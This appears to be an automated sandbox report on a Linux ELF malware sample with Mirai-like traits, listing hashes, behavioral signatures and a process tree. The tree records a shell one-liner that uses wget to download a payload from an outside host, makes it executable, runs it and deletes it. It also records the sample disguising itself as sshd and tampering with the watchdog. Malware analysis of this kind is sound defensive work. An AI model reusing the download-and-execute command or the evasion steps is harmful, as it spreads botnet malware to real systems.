Analysis
max time kernel: 142s
max time network: 143s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240221-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240221-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 22/02/2024, 21:46
Behavioral task: behavioral1
Sample: ed53374c74224ead232e63bbe7fa7242.elf
Resource: ubuntu1804-amd64-20240221-en
General
Target: ed53374c74224ead232e63bbe7fa7242.elf
Size: 114KB
MD5: ed53374c74224ead232e63bbe7fa7242
SHA1: e1ffd571459085cc2bd4c7ea2bc5916d408a9be3
SHA256: 918e9149b7bccfc9c8e9a22548e5953f249ac72bbf552af7774a41273a431d28
SHA512: 82d75789a09b5518ba22c8b79b9719c7933e6f1c6660259bbe4fb220af761e3f151f35148cfa25adf1f7b067c4e3f836cbfdb9ee69257b1c0d4e016f25f7f3a0
SSDEEP: 3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJiouf2yd1m7FnVqfJXoebNb:SKo/O8qtUbKVbm7FnVqfJXoebNb
Malware Config
Signatures

Changes its process name (1 IoCs)
  description: Changes the process name, possibly in an attempt to hide itself
  ioc: sshd
  pid: 1581
  process: ed53374c74224ead232e63bbe7fa7242.elf

Executes dropped EXE (1 IoCs)
  ioc: /tmp/.....
  pid: 1591
  process: .....

Modifies Watchdog functionality (1 TTPs, 2 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description: File opened for modification; ioc: /dev/watchdog
  description: File opened for modification; ioc: /dev/misc/watchdog

Reads system routing table (1 TTPs, 1 IoCs)
Gets active network interfaces from the /proc virtual filesystem.
  description: File opened for reading; ioc: /proc/net/route; process: ed53374c74224ead232e63bbe7fa7242.elf

Reads system network configuration (1 TTPs, 1 IoCs)
Uses contents of the /proc filesystem to enumerate network settings.
  description: File opened for reading; ioc: /proc/net/route; process: ed53374c74224ead232e63bbe7fa7242.elf

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
  description: File opened for modification; ioc: /tmp/.....; process: wget
Processes

/tmp/ed53374c74224ead232e63bbe7fa7242.elf (PID 1581)
  command: /tmp/ed53374c74224ead232e63bbe7fa7242.elf
  - Changes its process name
  - Reads system routing table
  - Reads system network configuration

/bin/sh (PID 1582)
  command: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

    /usr/bin/wget (PID 1586)
      command: wget -q http://gay.energy/.../vivid -O .....
      - Writes file to tmp directory

    /bin/chmod (PID 1590)
      command: chmod 777 .....

    /tmp/..... (PID 1591)
      command: ./.....
      - Executes dropped EXE

    /bin/sh (PID 1591)
      command: /bin/sh ./.....

    /bin/rm (PID 1593)
      command: rm -rf .....